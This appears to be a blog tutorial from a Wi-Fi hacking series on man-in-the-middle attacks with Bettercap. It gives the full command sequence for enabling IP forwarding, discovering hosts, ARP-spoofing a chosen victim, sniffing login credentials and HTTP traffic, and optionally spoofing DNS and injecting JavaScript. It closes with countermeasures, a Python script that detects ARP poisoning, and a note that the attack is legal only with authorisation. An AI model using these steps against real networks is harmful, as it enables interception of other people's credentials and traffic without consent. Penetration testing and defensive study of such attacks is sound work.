MITM Attacks with Bettercap (Wi-Fi Edition)

💡 Introduction

So far in this series, we’ve focused on gaining access to Wi-Fi networks. But once you’re inside the network, what’s next?

Welcome to Man-in-the-Middle (MITM) attacks — where you silently intercept, monitor, and manipulate traffic from unsuspecting devices. In this post, we’ll use Bettercap, a powerful framework for MITM attacks, traffic sniffing, and real-time manipulation.

❓ What is a MITM Attack?

In a MITM attack, the hacker positions themselves between the victim and the router, intercepting all the traffic flowing through.

They can:

  • Capture login credentials

  • Sniff unencrypted traffic

  • Modify requests or responses

  • Inject JavaScript or malicious code

Think of it like secretly reading someone’s mail before it reaches them.

⚙️ Tools Needed

  • Kali Linux (or any Linux distro with Bettercap)

  • Internal access to the Wi-Fi network

  • Bettercap installed (sudo apt install bettercap)

  • Wi-Fi adapter in managed mode (not monitor mode)

Step-by-Step: Performing a MITM Attack with Bettercap

1. Connect to Target Network

Connect your machine to the same Wi-Fi network as the victim.
No cracking is needed — just be on the same network.

2. Enable IP Forwarding

Enable IP forwarding to route traffic through your machine:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

3. Start Bettercap

Launch Bettercap with root privileges:

sudo bettercap -iface wlan0

Replace wlan0 with your actual interface name if different.

4. Discover Devices

Once inside the Bettercap console, scan for live hosts:

net.probe on
net.recon on
net.show

This will list all connected devices on the network.
Find and note the IP address of your target.

5. Launch MITM via ARP Spoofing

Set the target IP and start the spoofing attack:

set arp.spoof.targets <victim_ip>
arp.spoof on

You’re now positioned between the router and the target — intercepting traffic.

6. Sniff Credentials and Monitor Traffic

To sniff packets and monitor unencrypted data, use:

net.sniff on

Alternatively, enable HTTP proxy mode to intercept HTTP requests:

http.proxy on

With this, you’ll capture:

  • Login forms
  • GET/POST requests
  • Unencrypted credentials (if the site is not using HTTPS)

Advanced Modules (Optional)

  • dns.spoof on – Fake DNS responses

  • inject.js – Inject JavaScript into pages

  • https.proxy – Intercept HTTPS traffic (with caveats)

Bettercap also supports scripting and logging to automate attacks.

Real-World Countermeasures

  • Use HTTPS Everywhere

  • Deploy DNS over HTTPS (DoH)

  • Use VPNs on public Wi-Fi

  • Monitor ARP tables for poisoning

  • Apply client isolation on routers
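
To make "Monitor ARP tables for poisoning" concrete, here is an added example (not part of the original post and not Bettercap code) that parses a Linux /proc/net/arp snapshot and flags the two signs ARP spoofing leaves on a victim: the gateway's MAC changing from a recorded baseline, and one MAC answering for the gateway plus another IP. The sample table, addresses, gateway IP and function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample in /proc/net/arp format, as seen on a victim host:
# the gateway (192.168.1.1) and host .66 resolve to the same MAC.
SAMPLE_ARP = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         de:ad:be:ef:00:66     *        wlan0
192.168.1.66     0x1         0x2         de:ad:be:ef:00:66     *        wlan0
192.168.1.20     0x1         0x2         3c:22:fb:10:20:30     *        wlan0
192.168.1.30     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""

def parse_arp_table(text):
    """Return (ip, mac, device) for every resolved entry."""
    entries = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) != 6:
            continue
        ip, _hw, flags, mac, _mask, dev = fields
        # Flags 0x0 or an all-zero MAC mean the entry is incomplete.
        if int(flags, 16) == 0 or mac == "00:00:00:00:00:00":
            continue
        entries.append((ip, mac.lower(), dev))
    return entries

def find_poisoning(entries, gateway_ip, baseline_gateway_mac=None):
    """Return a list of human-readable findings (empty list = nothing seen)."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac, dev in entries:
        by_mac[(dev, mac)].append(ip)
        # Check 1: gateway MAC drifted from the value recorded when trusted.
        if ip == gateway_ip and baseline_gateway_mac and mac != baseline_gateway_mac.lower():
            findings.append(f"gateway {ip} is at {mac}, baseline is {baseline_gateway_mac.lower()}")
    # Check 2: one MAC answering for several IPs, one of them the gateway.
    # Other duplicates can be legitimate (multi-homed hosts, proxy ARP).
    for (dev, mac), ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            others = ", ".join(sorted(ip for ip in ips if ip != gateway_ip))
            findings.append(f"{mac} on {dev} claims gateway {gateway_ip} and {others}")
    return findings

if __name__ == "__main__":
    with open("/proc/net/arp") as f:             # Linux only
        live = parse_arp_table(f.read())
    for finding in find_poisoning(live, gateway_ip="192.168.1.1"):  # assumed gateway
        print("ALERT:", finding)
```

Record the gateway's MAC while the network is known to be clean and pass it as baseline_gateway_mac; the duplicate-MAC check works without a baseline but only fires once the host has also resolved the spoofing machine's own IP.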

Ethical Reminder

MITM attacks are extremely invasive and illegal without explicit authorization. This tutorial is intended for authorized lab environments, penetration testing, and cybersecurity training only.

Wrapping Up

Bettercap gives you full control once you’re inside a Wi-Fi network — from sniffing plain-text credentials to injecting scripts. It’s a powerful tool for both offensive research and defensive awareness.

Next up:
🛡️ Part 13 – How to Secure Your Wi-Fi from Hackers
